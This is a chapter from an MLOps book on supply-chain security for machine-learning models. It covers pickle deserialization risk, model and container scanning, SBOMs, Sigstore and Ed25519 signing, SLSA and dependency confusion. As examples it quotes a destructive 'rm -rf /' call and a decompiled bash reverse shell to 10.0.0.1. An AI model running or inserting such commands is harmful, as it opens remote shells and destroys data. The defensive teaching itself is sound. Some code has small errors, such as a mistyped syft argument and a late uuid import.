Keyboard shortcuts

Press or to navigate between chapters

Press ? to show this help

Press Esc to hide this help

Chapter 31.4: DevSecOps & Supply Chain Security

“An ML model is just a binary blob that executes matrix multiplication. Or so we thought, until someone put a reverse shell in the weights file.”

31.4.1. The Model Supply Chain Crisis

In modern MLOps, we rarely train from scratch. We download bert-base from Hugging Face, resnet from TorchVision, and docker images from Docker Hub. This is a Supply Chain. And it is currently wide open.

The Attack Surface

  1. Direct Dependency: The pip install tensorflow package.
  2. Model Dependency: The model.pth file.
  3. Data Dependency: The S3 bucket with training JPEGs.
  4. Container Dependency: The FROM python:3.9 base image.

31.4.2. The Pickle Vulnerability (Arbitrary Code Execution)

Python’s pickle module is the standard serialization format for PyTorch (torch.save), Scikit-Learn (joblib), and Pandas. It is insecure by design.

How Pickle Works

Pickle is a Virtual Machine. It contains opcodes. One of the opcodes is REDUCE, which allows calling any callable function with arguments.

  • Normal: REDUCE(torch.Tensor, [1,2,3]) -> Creates a tensor.
  • Evil: REDUCE(os.system, ["rm -rf /"]) -> Deletes your server.

The Exploit

Hugging Face hosts >500k models. Anyone can upload a .bin or .pth file. If you load a model from a stranger:

import torch
model = torch.load("downloaded_model.pth") # BOOM! Hacker owns your shell.

This happens instantly upon load. You don’t even need to run inference.

The Solution: Safetensors

Safetensors (developed by Hugging Face) is a format designed to be safe, fast, and zero-copy.

  • Safe: It purely stores tensors and JSON metadata. No executable code.
  • Fast: Uses memory mapping (mmap) for instant loading.

Rule: Block all .pkl, .pth, .bin files from untrusted sources. Only allow .safetensors or ONNX.


31.4.3. Scanning your Supply Chain

Just as we scan code for bugs, we must scan models and datasets for threats.

1. ModelScan

A tool to scan model files (PyTorch, TensorFlow, Keras, Sklearn) for known unsafe operators.

pip install modelscan

# Scan a directory
modelscan -p ./downloaded_models

# Output:
# CRITICAL: Found unsafe operator 'os.system' in model.pkl

2. Gitleaks (Secrets in Notebooks)

Data Scientists love Jupyter Notebooks. They also love hardcoding AWS keys in them.

  • Problem: Notebooks are JSON. Plaintext scanners often miss secrets inside the "source": [] blocks.
  • Solution: Use nbconvert to strip output before committing, and run gitleaks in CI.

3. CVE Scanning (Trivy)

ML Docker images are huge (5GB+) and full of vulnerabilities (old CUDA drivers, system libs).

trivy image pytorch/pytorch:2.0.1-cuda11.7-cudnn8-runtime

# Output: 500 Vulnerabilities (20 Critical).

Mitigation: Use Distroless images or “Wolfi” (Chainguard) images for ML containers to reduce surface area.


31.4.4. SBOM for AI (Software Bill of Materials)

An SBOM constitutes a list of ingredients. For AI, we need an AI-SBOM (or MLBOM).

The CycloneDX Standard

CycloneDX v1.5 added support for ML Models. It tracks:

  1. Model Metadata: Name, version, author.
  2. Dataset Ref: Hash of the training set.
  3. Hyperparameters: Learning rate, epochs.
  4. Hardware: “Trained on H100”.

Generating an SBOM

Tools like syft can generate SBOMs for containers/directories.

syft dirt:. -o cyclonedx-json > sbom.json

Why it matters

When the next “Log4 Shell” vulnerability hits a specific version of numpy or transformers, you can query your SBOM database: “Show me every model in production that was trained using numpy==1.20.


31.4.5. Model Signing (Sigstore)

How do you know model.safetensors was actually produced by your CI/CD pipeline and not swapped by a hacker?

Signing.

Sigstore / Cosign

Sigstore allows “Keyless Signing” using OIDC identity (e.g., GitHub Actions identity).

Signing (in CI):

# Authenticate via OIDC
cosign sign-blob --oidc-issuer https://token.actions.githubusercontent.com \
  ./model.safetensors

Verifying (in Inference Server):

cosign verify-blob \
  --certificate-identity "https://github.com/myorg/repo/.github/workflows/train.yml" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ./model.safetensors

If the signature doesn’t match, the model server refuses to load.


31.4.6. Confidential Computing (AWS Nitro Enclaves)

For high-security use cases (Healthcare, Finance), protecting the data in use (in RAM) is required. Usually, the Cloud Provider (AWS/GCP) technically has root access to the hypervisor and could dump your RAM.

Confidential Computing encrypts the RAM. The CPU (AMD EPYC or Intel SGX) holds the keys. Even AWS cannot see the memory.

Architecture: Nitro Enclaves

  1. Parent Instances: Standard EC2. Runs the web server.
  2. Enclave: A hardened, isolated VM with NO network, NO storage, and NO ssh. It only talks to the Parent via a local socket (VSOCK).
  3. Attestation: The Enclave proves to the client (via cryptographic proof signed by AWS KMS) that it is running the exact code expected.

Use Case: Private Interference

  • User: Sends encrypted genome data.
  • Enclave: Decrypts data inside the enclave, runs model inference, encrypts prediction.
  • Result: The Admin of the EC2 instance never sees the genome data.

31.4.7. Zero Trust ML Architecture

Combining it all into a holistic “Zero Trust” strategy.

  1. Identity: Every model, service, and user has an SPIFFE ID. No IP-based allowlists.
  2. Least Privilege: The Training Job has write access to s3://weights, but read-only to s3://data. The Inference Service has read-only to s3://weights.
  3. Validation:
    • Input: Validate shapes, types, and value ranges.
    • Model: Validate Signatures (Sigstore) and Scan Status (ModelScan).
    • Output: Validate PII and Confidence (Uncertainty Estimation).

31.4.9. Deep Dive: Supply-chain Levels for Software Artifacts (SLSA)

Google’s SLSA (pronounced “salsa”) framework is the gold standard for supply chain integrity. We adapt it for ML.

SLSA Levels for ML

  1. Level 1 (Scripted Build): You have a train.py script. You aren’t just manually running commands in a notebook.
  2. Level 2 (Version Control): The code and config are in Git. The build runs in a CI system (GitHub Actions).
  3. Level 3 (Verified History): The CI system produces a signed provenance attestation. “I, Github Action #55, produced this model.safetensors.”
  4. Level 4 (Two-Person Review + Hermetic): All code changes reviewed. Building is hermetic (no internet access during training to prevent downloading unpinned deps).

Implementing SLSA Level 3

Use the slsa-github-generator action.

uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v1.4.0
with:
  base64-subjects: "${{ hash_of_model }}"
  upload-assets: true

31.4.10. Air-Gapped & Private Deployments

For Banks and Defense, “Security” means “No Internet.”

The Pattern: VPC Endpoints

You never want your inference server to have 0.0.0.0/0 outbound access.

  • Problem: How do you download the model from S3 or talk to Bedrock?
  • Solution: AWS PrivateLink (VPC Endpoints).
    • Creates a local network interface (ENI) in your subnet that routes to S3/Bedrock internally on the AWS backbone.
    • No NAT Gateway required. No Internet Gateway required.

PyPI Mirroring

You cannot run pip install tensorflow in an air-gapped environment.

  • Solution: Run a private PyPI mirror (Artifactory / AWS CodeArtifact).
  • Process: Security team scans packages -> Pushes to Private PyPI -> Training jobs pull from Private PyPI.

31.4.11. Tool Spotlight: Fickling

We mentioned modelscan. Fickling is a more aggressive tool that can reverse-engineer Pickle files to find the injected code.

Decompiling a Pickle

Pickle is a stack-based language. Fickling decompiles it into human-readable Python code.

fickling --decompile potentially_evil_model.pth

# Output:
# import os
# os.system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')

This serves as forensic evidence during an incident response.


31.4.12. Zero Trust Data Access

Security isn’t just about the code; it’s about the Data.

OPA (Open Policy Agent) for Data

Use OPA to enforce matching between User Clearance and Data Classification.

package data_access

default allow = false

# Allow if user clearance level >= data sensitivity level
allow {
    user_clearance := input.user.attributes.clearance_level
    data_sensitivity := input.data.classification.level
    user_clearance >= data_sensitivity
}

Purpose-Based Access Control

“Why does this model need this data?”

  • Training: Needs bulk access.
  • Inference: Needs single-record access.
  • Analyst: Needs aggregated/anonymized access.

31.4.14. Deep Dive: Model Cards for Security

Security is about Transparency. A Model Card (Mitchell et al.) documents the safety boundaries of the model.

Key Security Sections

  1. Intended Use: “This model is for poetic generation. NOT for medical advice.”
  2. Out-of-Scope Use: “Do not use for credit scoring.”
  3. Training Data: “Trained on Public Crawl 2023 (Potential Toxicity).”
  4. limitations: “Hallucinates facts about events post-2022.”

Automating Model Cards

Use the huggingface_hub Python library to programmatically generate cards in CI.

from huggingface_hub import ModelCard, ModelCardData

card_data = ModelCardData(
    language='en',
    license='mit',
    model_name='fin-bert-v2',
    finetuned_from='bert-base-uncased',
    tags=['security-audited', 'slsa-level-3']
)

card = ModelCard.from_template(
    card_data,
    template_path="security_template.md"
)
card.save('README.md')

31.4.15. Private Model Registries (Harbor / Artifactory)

Don’t let your servers pull from huggingface.co directly.

  • Risk: Hugging Face could go down, or the model author could delete/update the file (Mutable tags).
  • Solution: Proxy everything through an OCI-compliant registry.

Architecture

  1. Curator: Security Engineer approves bert-base.
  2. Proxy: dronerepo.corp.com caches bert-base.
  3. Training Job: FROM dronerepo.corp.com/bert-base.

Harbor Config (OCI)

Harbor v2.0+ supports OCI artifacts. You can push models as Docker layers.

# Push Model to OCI Registry
oras push myregistry.com/models/bert:v1 \
  --artifact-type application/vnd.model.package \
  ./model.safetensors

This treats the model exactly like a Docker image (immutable, signed, scanned).


31.4.16. War Story: The PyTorch Dependency Confusion

“We installed pytorch-helpers and got hacked.”

The Attack

  • Concept: Dependency Confusion (Alex Birsan).
  • Setup: Company X uses an internal package called pytorch-helpers hosted on their private PyPI.
  • Attack: Hacker registers pytorch-helpers on the public PyPI with a massive version number (v99.9.9).
  • Execution: When pip install pytorch-helpers runs in CI, pip (by default) looks at both Public and Private repos and picks the highest version. It downloaded the hacker’s v99 package.

Not just Python

This attacks NPM, RubyGems, and Nuget too.

The Fix

  1. Namespace Scoping: Use scoped packages (@company/helpers).
  2. Strict Indexing: Configure pip to only look at private repo for internal names. --extra-index-url is dangerous. Use with caution.

31.4.17. Interview Questions

Q1: What is a “Hermetic Build” in MLOps?

  • Answer: A build process where the network is disabled (except for a specific, verified list of inputs). It guarantees that if I run the build today and next year, I get bit-for-bit identical results. Standard pip install is NOT hermetic because deps change.

Q2: Why is Model Signing separate from Container Signing?

  • Answer: Containers change rarely (monthly). Models change frequently (daily/hourly). Signing them separately allows you to re-train the model without rebuilding the heavy CUDA container.

31.4.19. Appendix: Production Model Signing Tool (Python)

Below is a complete implementation of a CLI tool to Sign and Verify machine learning models using Asymmetric Cryptography (Ed25519). This is the foundation of a Level 3 SLSA build.

import argparse
import os
import sys
import hashlib
from cryptography.hazmat.primitives.asymmetric import ed25519
from cryptography.hazmat.primitives import serialization

class ModelSigner:
    def __init__(self):
        pass

    def generate_keys(self, base_path: str):
        """Generates Ed25519 private/public keypair"""
        private_key = ed25519.Ed25519PrivateKey.generate()
        public_key = private_key.public_key()

        # Save Private Key (In production, this stays in Vault/KMS)
        with open(f"{base_path}.priv.pem", "wb") as f:
            f.write(private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.PKCS8,
                encryption_algorithm=serialization.NoEncryption()
            ))

        # Save Public Key
        with open(f"{base_path}.pub.pem", "wb") as f:
            f.write(public_key.public_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PublicFormat.SubjectPublicKeyInfo
            ))
        
        print(f"Keys generated at {base_path}.priv.pem and {base_path}.pub.pem")

    def sign_model(self, model_path: str, key_path: str):
        """Signs the SHA256 hash of a model file"""
        # 1. Load Key
        with open(key_path, "rb") as f:
            private_key = serialization.load_pem_private_key(
                f.read(), password=None
            )

        # 2. Hash Model (Streaming for large files)
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            while chunk := f.read(8192):
                sha256.update(chunk)
        digest = sha256.digest()

        # 3. Sign
        signature = private_key.sign(digest)

        # 4. Save Signature
        sig_path = f"{model_path}.sig"
        with open(sig_path, "wb") as f:
            f.write(signature)
        
        print(f"Model signed. Signature at {sig_path}")

    def verify_model(self, model_path: str, key_path: str, sig_path: str):
        """Verifies integrity and authenticity"""
        # 1. Load Key
        with open(key_path, "rb") as f:
            public_key = serialization.load_pem_public_key(f.read())

        # 2. Load Signature
        with open(sig_path, "rb") as f:
            signature = f.read()

        # 3. Hash Model
        sha256 = hashlib.sha256()
        try:
            with open(model_path, "rb") as f:
                while chunk := f.read(8192):
                    sha256.update(chunk)
            digest = sha256.digest()
        except FileNotFoundError:
            print("Model file not found.")
            sys.exit(1)

        # 4. Verify
        try:
            public_key.verify(signature, digest)
            print("SUCCESS: Model signature is VALID. The file is authentic.")
        except Exception as e:
            print("CRITICAL: Model signature is INVALID! Do not load this file.")
            sys.exit(1)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ML Model Signing Tool")
    subparsers = parser.add_subparsers(dest="command")

    gen = subparsers.add_parser("keygen", help="Generate keys")
    gen.add_argument("--name", required=True)

    sign = subparsers.add_parser("sign", help="Sign a model")
    sign.add_argument("--model", required=True)
    sign.add_argument("--key", required=True)

    verify = subparsers.add_parser("verify", help="Verify a model")
    verify.add_argument("--model", required=True)
    verify.add_argument("--key", required=True)
    verify.add_argument("--sig", required=True)

    args = parser.parse_args()
    signer = ModelSigner()

    if args.command == "keygen":
        signer.generate_keys(args.name)
    elif args.command == "sign":
        signer.sign_model(args.model, args.key)
    elif args.command == "verify":
        signer.verify_model(args.model, args.key, args.sig)

31.4.20. Appendix: Simple SBOM Generator

A script to generate a CycloneDX-style JSON inventory of the current Python environment.

import pkg_resources
import json
import socket
import datetime

def generate_sbom():
    installed_packages = pkg_resources.working_set
    sbom = {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "serialNumber": f"urn:uuid:{uuid.uuid4()}",
        "version": 1,
        "metadata": {
            "timestamp": datetime.datetime.utcnow().isoformat(),
            "tool": {
                "vendor": "MLOps Book",
                "name": "SimpleSBOM",
                "version": "1.0.0"
            },
            "component": {
                "type": "container",
                "name": socket.gethostname()
            }
        },
        "components": []
    }

    for package in installed_packages:
        component = {
            "type": "library",
            "name": package.project_name,
            "version": package.version,
            "purl": f"pkg:pypi/{package.project_name}@{package.version}",
            "description": "Python Package"
        }
        sbom["components"].append(component)

    return sbom

if __name__ == "__main__":
    import uuid
    print(json.dumps(generate_sbom(), indent=2))

31.4.21. Summary

DevSecOps is about shifting security left.

  1. Don’t Pickle: Use Safetensors.
  2. Scan Everything: Scan models and containers in CI.
  3. Sign Artifacts: Use Sigstore to guarantee provenance.
  4. Isolate: Run high-risk parsing (like PDF parsing) in sandboxes/enclaves.
  5. Inventory: Maintain an SBOM so you know what you are running.
  6. Air-Gap: If it doesn’t need the internet, cut the cable.
  7. Private Registry: Treating models as OCI artifacts is the future of distribution.
  8. Tooling: Use the provided ModelSigner to implement authentication today.